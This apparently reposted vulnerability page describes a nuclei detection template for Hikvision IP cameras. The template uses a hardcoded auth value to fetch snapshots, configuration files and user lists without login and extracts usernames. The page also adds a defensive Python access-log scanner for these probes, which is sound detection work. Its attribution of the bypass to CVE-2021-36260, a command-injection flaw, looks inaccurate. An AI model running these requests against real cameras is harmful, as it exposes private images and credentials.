Hikvision IP Camera - Snapshot, Config, and User Info Exposure

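Vulnerability Information

Vulnerability name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure

Vulnerability ID:

  • CVE: CVE-2021-36260

Vulnerability type: Information disclosure

Severity: High

Description: This vulnerability affects Hikvision IP cameras, IoT devices widely used for enterprise and home surveillance. Hikvision is a leading global supplier of video surveillance products, and its IP cameras are deployed in a variety of security-sensitive environments such as government agencies, banks, schools, and residential areas. The vulnerability allows an unauthenticated attacker to access sensitive endpoints, including live snapshots, encrypted configuration files, and the full user credential XML. This is mainly caused by an exploit chain of CVE-2021-36260 and related bypass logic. The technical root cause is the device's improper handling of authentication requests, which lets an attacker bypass the authentication mechanism and access sensitive information directly. This information disclosure can lead to serious security risks, including but not limited to privacy violations, disclosure of security configuration, and further system intrusion. An attacker can use the leaked information for identity impersonation, tampering with system configuration, or other malicious activity. Because the vulnerability allows unauthenticated access and can be exploited automatically, the threat to affected devices is high.

Vendor: Hikvision

Product name: Hikvision IP Camera

Source: https://github.com/projectdiscovery/nuclei-templates/blob/c638200226d238edb5730d453bea2911782f68a6/vulnerabilities%2Fiot%2Fhikvision%2Fhikvision-cam-info-exposure.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details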

id: hikvision-cam-info-exposure

info:
  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
  author: AbdulrahmanTamim
  severity: high
  description: |
    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2021-36260
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://seclists.org/fulldisclosure/2017/Sep/23
  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml

variables:
  b64auth: YWRtaW46MTEK

requests:
  # 1. Snapshot endpoint: a JPEG image returned without a login
  - method: GET
    path:
      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    # Require both matchers; the default "or" would flag any 200 response
    matchers-condition: and
    matchers:
      - name: "Unauthenticated Snapshot Exposure"
        type: word
        part: header
        words:
          - "Content-Type: image/jpeg"
      - type: status
        status:
          - 200

  # 2. Configuration file download
  - method: GET
    path:
      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers-condition: and
    matchers:
      - name: "Downloadable Config File"
        type: word
        part: header
        words:
          - "Content-Type: application/octet-stream"
      - type: status
        status:
          - 200

  # 3. User list XML; the extractor reports each user name found in the body
  - method: GET
    path:
      - "{{BaseURL}}/Security/users?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers-condition: and
    matchers:
      - name: "Exposed Usernames"
        type: word
        words:
          - "<userName>"
          - "<userLevel>"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: Usernames
        group: 1
        regex:
          - "<userName>(.*?)</userName>"
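
A defender-side counterpart to the template above, as an added example that is not part of the original page or of the nuclei-templates project: it scans access-log lines for requests to the three endpoints that carry an auth query parameter and records whether the device answered with 200. It assumes a reverse proxy or gateway in front of the cameras writes common/combined-format logs; find_probes, SENSITIVE_PATHS and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths requested by the template above, mapped to what each one exposes.
# Compared case-insensitively (a choice made for this example).
SENSITIVE_PATHS = {
    "/onvif-http/snapshot": "snapshot",
    "/system/configurationfile": "config file",
    "/security/users": "user list",
}

# Assumed log format: common/combined access log written by a proxy in front of the cameras.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_probes(lines):
    """Return one finding per request to a sensitive path that carries ?auth=."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        exposed = SENSITIVE_PATHS.get(url.path.rstrip("/").lower())
        params = parse_qs(url.query, keep_blank_values=True)
        if exposed is None or "auth" not in params:
            continue
        findings.append({
            "client": m["ip"],
            "time": m["ts"],
            "resource": exposed,
            # A 200 means the device answered: treat that data as disclosed.
            "served": m["status"] == "200",
        })
    return findings


# Constructed sample lines (documentation addresses, placeholder auth value).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2025:09:14:02 +0000] "GET /Security/users?auth=PLACEHOLDER HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jul/2025:09:14:03 +0000] "GET /System/configurationFile?auth=PLACEHOLDER HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
    '192.0.2.20 - - [10/Jul/2025:09:15:40 +0000] "GET /onvif-http/snapshot HTTP/1.1" 401 0 "-" "vms/1.0"',
    '192.0.2.20 - - [10/Jul/2025:09:16:00 +0000] "GET /doc/page/login.asp HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        print(f["time"], f["client"], f["resource"], "SERVED" if f["served"] else "refused")
```

A finding with served set to true means the listed resource left the device; rotate the credentials on that camera and restrict who can reach its web interface.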



http://example.com/2025/07/10/github_2898359546/
Author: lianccc
Published: July 10, 2025
License